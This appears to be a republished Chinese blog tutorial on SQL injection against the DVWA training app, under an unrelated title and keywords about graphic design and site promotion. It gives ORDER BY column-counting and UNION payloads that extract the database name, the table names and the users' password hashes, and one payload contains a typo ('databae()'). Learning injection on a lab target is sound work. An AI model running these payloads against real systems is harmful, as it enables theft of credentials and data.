当前位置: 首页> 文旅> 旅游 > 平面设计教程自学_个人小程序怎么做_站长之家网站排行榜_一个平台怎么推广

平面设计教程自学_个人小程序怎么做_站长之家网站排行榜_一个平台怎么推广

时间:2025/7/9 3:40:35来源:https://blog.csdn.net/qq_27683317/article/details/142378145 浏览次数:0次
平面设计教程自学_个人小程序怎么做_站长之家网站排行榜_一个平台怎么推广
  1. order by 利用

判断某表有几列。order by 后面跟数字表示按第几列来排序,如果数字超出最大列数,则会报错。

# 利用order by 漏洞判断select后的列数

SELECT first_name, last_name FROM users WHERE user_id ='1' order by 3#

  1. union 利用

union的特点:

1. union两边的sql列数要一样;

2. 不管前面的sql语句是否成功执行,后面的sql都会执行。

# 利用union漏洞得到该表所在的数据库名

SELECT first_name, last_name FROM users WHERE user_id ='1' union select user(), databae() #

# 利用union漏洞得到指定数据库下的所有表名

SELECT first_name, last_name FROM users WHERE user_id ='1' union select table_name, table_schema from information_schema.tables where table_schema='dvwa'#

# 利用union漏洞利用用户名+密码

SELECT first_name, last_name FROM users WHERE user_id ='1' union select user,password from users#

关键字:平面设计教程自学_个人小程序怎么做_站长之家网站排行榜_一个平台怎么推广

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: